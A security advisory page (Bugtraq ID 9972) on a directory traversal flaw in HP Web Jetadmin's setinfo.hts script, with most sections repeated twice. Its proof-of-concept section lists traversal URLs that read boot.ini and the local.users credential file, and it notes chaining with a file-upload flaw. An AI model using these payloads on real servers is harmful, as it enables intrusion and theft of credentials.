HP Web Jetadmin setinfo.hts Script Directory Traversal Vulnerability
BID:9972
Info
HP Web Jetadmin setinfo.hts Script Directory Traversal Vulnerability
| Bugtraq ID: | 9972 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 24 2004 12:00AM |
| Updated: | Mar 24 2004 12:00AM |
| Credit: | Discovery is credited to "wirepair" <[email protected]>. |
| Vulnerable: |
HP Web Jetadmin 7.5.2456 |
| Not Vulnerable: | |
Discussion
HP Web Jetadmin setinfo.hts Script Directory Traversal Vulnerability
It has been reported that HP Web JetAdmin may be prone to a directory traversal vulnerability allowing remote attackers to access information outside the server root directory. The problem exists due to insufficient sanitization of user-supplied data passed via the 'setinclude' parameter of 'setinfo.hts' script.
This vulnerability can be combined with HP Web Jetadmin Firmware Update Script Arbitrary File Upload Weakness (BID 9971) to upload malicious files to a vulnerable server in order to gain unauthorized access to a host.
This issue has been tested with an authenticated account on HP Web Jetadmin version 7.5.2546 running on a Windows platform.
It has been reported that HP Web JetAdmin may be prone to a directory traversal vulnerability allowing remote attackers to access information outside the server root directory. The problem exists due to insufficient sanitization of user-supplied data passed via the 'setinclude' parameter of 'setinfo.hts' script.
This vulnerability can be combined with HP Web Jetadmin Firmware Update Script Arbitrary File Upload Weakness (BID 9971) to upload malicious files to a vulnerable server in order to gain unauthorized access to a host.
This issue has been tested with an authenticated account on HP Web Jetadmin version 7.5.2546 running on a Windows platform.
Exploit / POC
HP Web Jetadmin setinfo.hts Script Directory Traversal Vulnerability
No exploit is required.
The following proof of concept has been provided:
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../auth/local.users
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../hpjwja/firmware/printer/test.inc
No exploit is required.
The following proof of concept has been provided:
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../auth/local.users
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../hpjwja/firmware/printer/test.inc
Solution / Fix
HP Web Jetadmin setinfo.hts Script Directory Traversal Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
HP Web Jetadmin setinfo.hts Script Directory Traversal Vulnerability
References:
References:
- HP Web Jetadmin Homepage (HP)
- HP Web JetAdmin vulnerabilities. ("wirepair"